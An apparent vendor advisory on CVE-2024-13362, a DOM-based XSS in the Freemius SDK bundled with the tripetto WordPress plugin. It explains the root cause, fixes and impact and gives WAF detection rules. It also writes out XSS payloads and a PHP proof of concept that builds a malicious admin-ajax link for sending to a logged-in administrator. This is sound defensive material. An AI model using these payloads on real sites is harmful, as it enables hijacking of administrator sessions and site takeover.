Atomic Edge analysis of CVE-2024-13362 (metadata-based):
This is a reflected, DOM-based cross-site scripting vulnerability in the Freemius SDK, a licensing and monetization library bundled by multiple WordPress plugins and themes, including the “tripetto” plugin. It affects the Freemius SDK up to and including version 2.10.1 and, through the bundled SDK, the “tripetto” plugin up to and including version 8.0.7. The CVSS score is 6.1 (Medium) with the vector AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N: exploitable over the network without authentication, but only with user interaction (the victim must open a crafted link), with low impact on confidentiality and integrity and none on availability.
Root Cause:
Based on the CWE-79 classification and the description, the root cause is improper neutralization of the ‘url’ parameter. JavaScript shipped with the Freemius SDK or with the plugin reads ‘url’ from the request URL (a DOM source such as location.search or location.href) and hands it to a DOM sink without validating the URL scheme or encoding the value for the context it lands in. That is the defining property of DOM-based XSS: the server may echo the parameter unchanged or never see it at all, and the payload is executed client-side by a sink such as innerHTML, document.write, eval, or an href attribute that accepts a javascript: URL. Atomic Edge analysis infers this from the CWE and description; no source code was available for confirmation.
Exploitation:
An unauthenticated attacker crafts a link that carries a script payload in the ‘url’ parameter. For the “tripetto” plugin the vulnerable endpoint is presumably an AJAX handler or a Freemius connectivity-check page whose JavaScript reads ‘url’ and writes it into the DOM; Atomic Edge has not confirmed the exact endpoint. The attack vector is social engineering: the attacker sends the crafted link to a logged-in user, and when the user opens it the payload runs in that user’s browser within the site’s origin. The payload shape depends on the sink. For an href or location sink, url=javascript:alert(document.cookie) suffices; for an innerHTML or document.write sink the value must break out of the surrounding markup, for example url="><img src=x onerror=alert(document.cookie)>, URL-encoded in the link. Two practical notes: WordPress sets its authentication cookies HttpOnly, so document.cookie will not yield them, but script running in the wp-admin origin can still send authenticated requests (the browser attaches the cookies and the page exposes the nonces) and so perform actions as the victim or rewrite page content; and if the page script reads the value from location.hash rather than the query string, the payload never leaves the browser and server-side logs or WAFs will not see it.
Remediation:
The fix is to treat ‘url’ as untrusted at the point where it reaches the DOM. On the client, parse the value with the URL constructor, accept only http: and https: schemes, and assign it with setAttribute('href', ...) or textContent rather than by concatenating it into a string handed to innerHTML or document.write; encodeURIComponent() is for building query strings and does not make a value safe in an HTML or JavaScript context, and HTML-encoding alone does not stop a javascript: URL. On the server, wherever PHP echoes the value into markup or inline script, use WordPress’s esc_url() (or esc_url_raw() for storage and redirects), esc_js() for inline-script strings, or wp_json_encode() to hand data to JavaScript, and validate against an allow-list of expected hosts where the plugin knows which endpoints it talks to. Versions after Freemius SDK 2.10.1, and tripetto releases after 8.0.7 that bundle the updated SDK, carry the fix; because no source was examined, the exact change (client-side scheme validation, server-side escaping, or both) is an inference from the CWE and description.
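To make the Root Cause and Remediation sections concrete, here is an added example (written for this page; it is not Freemius, tripetto or Atomic Edge code) that models the inferred sink in plain JavaScript: a function that concatenates the ‘url’ parameter into link markup, beside a hardened version that allow-lists the scheme and encodes the value. Only the parameter name comes from the CVE description; the markup, function names and sample inputs are assumptions, and the code runs under Node without a browser.

```javascript
// Added example (not Freemius, tripetto or Atomic Edge code): a minimal model of
// the DOM-based pattern the advisory infers, beside a hardened variant.
// Only the parameter name 'url' comes from the CVE description; the element
// markup, function names and sample inputs below are assumptions.

// Read the 'url' parameter from a query string, the way page script would
// read it from location.search (the DOM-XSS "source").
function getUrlParam(search) {
  return new URLSearchParams(search).get('url');
}

// Vulnerable: concatenates attacker-controlled input into markup that would
// be assigned to innerHTML (the "sink"). Two problems: the value can close
// the attribute and inject a handler, and a javascript: scheme survives intact.
function renderLinkVulnerable(search) {
  const url = getUrlParam(search) || '';
  return `<a href="${url}">Connectivity check</a>`;
}

// Hardened: parse with the URL constructor, accept only http(s), and
// HTML-encode on the way into the attribute. In a browser you would skip the
// string entirely and use el.setAttribute('href', safe) or el.textContent;
// the string form keeps this runnable under Node.
const ALLOWED_SCHEMES = new Set(['http:', 'https:']);

function sanitizeUrl(raw) {
  let parsed;
  try {
    parsed = new URL(raw);      // throws on relative or malformed input
  } catch (e) {
    return null;
  }
  // Scheme allow-list: rejects javascript:, data:, vbscript: and friends.
  return ALLOWED_SCHEMES.has(parsed.protocol) ? parsed.href : null;
}

function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

function renderLinkHardened(search) {
  const safe = sanitizeUrl(getUrlParam(search) || '');
  const href = safe === null ? '#' : escapeHtml(safe);
  return `<a href="${href}">Connectivity check</a>`;
}

// Constructed sample query strings: one benign value and two payload shapes
// the analysis describes (scheme abuse and attribute breakout).
const SAMPLES = {
  benign:   '?url=' + encodeURIComponent('https://example.com/?content=1'),
  scheme:   '?url=' + encodeURIComponent('javascript:alert(document.domain)'),
  breakout: '?url=' + encodeURIComponent('x" onmouseover="alert(1)'),
};

// Why HTML-encoding alone is not the fix: the scheme payload contains no
// HTML metacharacters, so escapeHtml leaves it executable inside an href.
function escapeOnlyLeavesSchemeIntact() {
  return escapeHtml('javascript:alert(document.domain)') === 'javascript:alert(document.domain)';
}

for (const [name, qs] of Object.entries(SAMPLES)) {
  console.log(name, '\n  vulnerable:', renderLinkVulnerable(qs), '\n  hardened:  ', renderLinkHardened(qs));
}
```

The escapeOnlyLeavesSchemeIntact() check is the point most often missed: javascript:alert(...) contains no HTML metacharacters, so an output encoder passes it through unchanged and only the scheme allow-list stops it. The breakout payload, by contrast, is stopped twice over: the URL constructor rejects it for lacking a scheme, and escapeHtml would neutralise the quote even if it had one.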
Impact:
Successful exploitation lets the attacker run arbitrary JavaScript in the victim’s browser within the site’s origin. Possible consequences are session riding (authenticated requests issued with the victim’s cookies and nonces), defacement of the admin dashboard, phishing overlays, and any action the victim is authorised to perform, such as creating users or installing plugins when the victim is an administrator. The scope change in the CVSS vector (S:C) is the standard CVSS v3 treatment of XSS: the vulnerable component is the web application, but the impact is realised in a different security authority, the victim’s browser; it is not a statement about how far the plugin’s own page reaches. The damage is bounded by the victim’s privileges rather than by the plugin, so an administrator victim exposes the whole WordPress installation, and on a multisite network a super administrator victim exposes every site in the network.
Here you will find our ModSecurity compatible rule to protect against this particular CVE.
# Atomic Edge WAF Rule - CVE-2024-13362 (metadata-based)
# Blocks reflected XSS in the 'url' parameter for Freemius AJAX endpoints
# Targets the common AJAX handler pattern used by vulnerable plugins (e.g., tripetto).
# The action name 'tripetto_freemius_check' and the plugin path below are assumptions from the
# CVE metadata, not from the plugin source; adjust them to the handler observed on the site.
# Caveat: a payload carried in the URL fragment (location.hash) never reaches the server, so no
# WAF rule sees it; these rules cover the query-string case. Trailing backslashes are required,
# ModSecurity reads each directive as a single line. Schemes must carry their colon and an event
# handler must follow a delimiter, so benign values such as ?content=1 are not blocked; decoding
# runs before lowercasing so double-encoded and entity-encoded payloads are normalised first.
SecRule REQUEST_URI "@beginsWith /wp-admin/admin-ajax.php" \
    "id:20261994,phase:2,deny,status:403,log,chain,\
    msg:'CVE-2024-13362 Reflected XSS via url parameter in Freemius',severity:'CRITICAL',tag:'CVE-2024-13362'"
    SecRule ARGS:action "@pm tripetto_freemius_check" "chain"
    SecRule ARGS:url "@rx (?:javascript:|data:|vbscript:|<script|(?:^|[\s\"'<>/])on[a-z]+\s*=|&#x?[0-9a-f]{2,};)" \
        "t:urlDecodeUni,t:htmlEntityDecode,t:lowercase"
# Alternative rule for direct page endpoints that reflect the url parameter (if AJAX is not used).
# REQUEST_FILENAME is the path without the query string; REQUEST_URI includes '?url=...' and a
# '\.php$' anchor on it would never match.
SecRule REQUEST_FILENAME "@rx /wp-content/plugins/tripetto/.*freemius.*\.php$" \
    "id:20261995,phase:2,deny,status:403,log,chain,\
    msg:'CVE-2024-13362 Reflected XSS via url parameter in Freemius',severity:'CRITICAL',tag:'CVE-2024-13362'"
    SecRule ARGS:url "@rx (?:javascript:|data:|vbscript:|<script|(?:^|[\s\"'<>/])on[a-z]+\s*=|&#x?[0-9a-f]{2,};)" \
        "t:urlDecodeUni,t:htmlEntityDecode,t:lowercase"
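Because the event-handler and scheme alternatives in a pattern of this kind decide whether ordinary URLs get blocked, the following added example (not part of the Atomic Edge rule set) models the rule’s matching in JavaScript and runs a loose pattern and an anchored pattern over constructed ‘url’ values, applying the same URL-decode-then-lowercase transformation. The sample values are constructed for this example; the patterns use JavaScript regex syntax, which is identical to PCRE for these constructs.

```javascript
// Added example, not part of the Atomic Edge rule set: the WAF rule's detection
// logic modelled in JavaScript and run over constructed 'url' values, so the
// effect of anchoring the event-handler and scheme alternatives can be seen.
// Sample values below are constructed for this example.

// Loose pattern: bare 'javascript' and 'on[a-z]+=' anywhere in the value.
const LOOSE = /(?:javascript|data:|vbscript|<script|on[a-z]+=|&#x?[0-9a-f]{2,};)/;

// Anchored pattern: schemes must carry their colon, and an event handler only
// counts when 'on...' follows a delimiter that could precede an attribute name.
const ANCHORED = /(?:javascript:|data:|vbscript:|<script|(?:^|[\s"'<>\/])on[a-z]+\s*=|&#x?[0-9a-f]{2,};)/;

// Mirror the rule's transformations: decode percent-encoding (tolerating
// malformed sequences) and lowercase before matching.
function normalize(value) {
  let out = value;
  try {
    out = decodeURIComponent(value);
  } catch (e) {
    // keep the raw value when a stray '%' makes decoding fail
  }
  return out.toLowerCase();
}

function wouldBlock(pattern, value) {
  return pattern.test(normalize(value));
}

// [value, isMalicious] pairs: benign URLs a plugin might legitimately pass,
// plus payload shapes the analysis describes.
const SAMPLES = [
  ['https://example.com/?content=1', false],        // 'content=' contains 'ontent='
  ['https://example.com/javascript-guide', false],  // bare 'javascript' in a path
  ['https://example.com/?online=true', false],      // 'online=' looks like a handler
  ['javascript:alert(document.domain)', true],
  ['%6Aavascript:alert(1)', true],                  // percent-encoded 'j'
  ['x" onmouseover="alert(1)', true],               // attribute breakout
  ['"><img src=x onerror=alert(1)>', true],         // innerHTML-style breakout
  ['&#x6a;avascript:alert(1)', true],               // HTML-entity-encoded 'j'
];

// Return the benign values a pattern blocks (false positives) and the
// malicious values it lets through (false negatives).
function evaluate(pattern) {
  const falsePositives = [];
  const falseNegatives = [];
  for (const [value, malicious] of SAMPLES) {
    const blocked = wouldBlock(pattern, value);
    if (blocked && !malicious) falsePositives.push(value);
    if (!blocked && malicious) falseNegatives.push(value);
  }
  return { falsePositives, falseNegatives };
}

console.log('loose   ', evaluate(LOOSE));
console.log('anchored', evaluate(ANCHORED));
```

The anchored pattern keeps content=, online= and a path containing javascript out of the block list while still catching the percent-encoded and entity-encoded scheme payloads. It is still a signature, not a fix: a javascript: scheme with an embedded tab or newline, which browsers strip before parsing, slips past both patterns, and a payload carried in the URL fragment never reaches the WAF at all.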
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2024-13362 - Freemius <= 2.10.1 - Reflected DOM-Based Cross-Site Scripting via url Parameter
// This PoC demonstrates the reflected XSS vulnerability in the Freemius SDK used by the 'tripetto' plugin.
// The vulnerable endpoint is likely the Freemius connectivity check AJAX handler or a page that reflects the 'url' parameter.
// Since no source code is available, we assume the parameter is passed to a JavaScript DOM API without sanitization;
// the action name 'tripetto_freemius_check' below is an assumption, not a confirmed handler name.
$target_url = 'http://example.com'; // CHANGE THIS to the target WordPress site
// Construct the malicious link with a JavaScript payload in the 'url' parameter.
// The payload will execute when the victim's browser processes the URL.
// We use a simple alert to confirm XSS, but real attackers would use cookie theft or other malicious actions.
$payload = 'javascript:alert(document.domain)';
$vulnerable_endpoint = '/wp-admin/admin-ajax.php?action=tripetto_freemius_check&url=' . urlencode($payload);
$full_url = $target_url . $vulnerable_endpoint;
echo "[+] Atomic Edge PoC for CVE-2024-13362\n";
echo "[+] Target: $target_url\n";
echo "[+] Crafted malicious URL:\n";
echo $full_url . "\n\n";
echo "[+] To exploit: Send this link to a logged-in admin. When clicked, the XSS payload executes.\n";
// Optional: Send the request via cURL to verify the endpoint exists and reflects the parameter.
// Note: for a purely DOM-based sink the payload is read from the URL by page JavaScript and may never
// appear in the HTTP response body, so a negative reflection check here does not rule out the bug;
// confirm in a browser with the developer tools open.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $full_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // lab use only; do not disable verification against real targets
curl_setopt($ch, CURLOPT_TIMEOUT, 15);
$response = curl_exec($ch);
if ($response === false) {
    echo "[-] cURL error: " . curl_error($ch) . "\n";
    curl_close($ch);
    exit(1);
}
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if ($http_code === 200) {
    echo "[+] Endpoint responded with HTTP 200.\n";
    if (strpos($response, $payload) !== false) {
        echo "[+] The raw payload appears in the response body (server-side reflection).\n";
    } else {
        echo "[*] Payload not found in the response body; the sink may be DOM-only, verify in a browser.\n";
    }
    echo "[+] Response snippet:\n";
    echo substr($response, 0, 500) . "\n";
} elseif ($http_code === 400 && trim($response) === '0') {
    // Current WordPress releases answer an unregistered admin-ajax action with HTTP 400 and body '0'.
    echo "[-] HTTP 400 with body '0': admin-ajax.php has no handler registered for this action name.\n";
} else {
    echo "[-] HTTP $http_code received. The endpoint might require authentication or different parameters.\n";
    echo "[-] This PoC is metadata-based; actual exploitation may require adjustments.\n";
}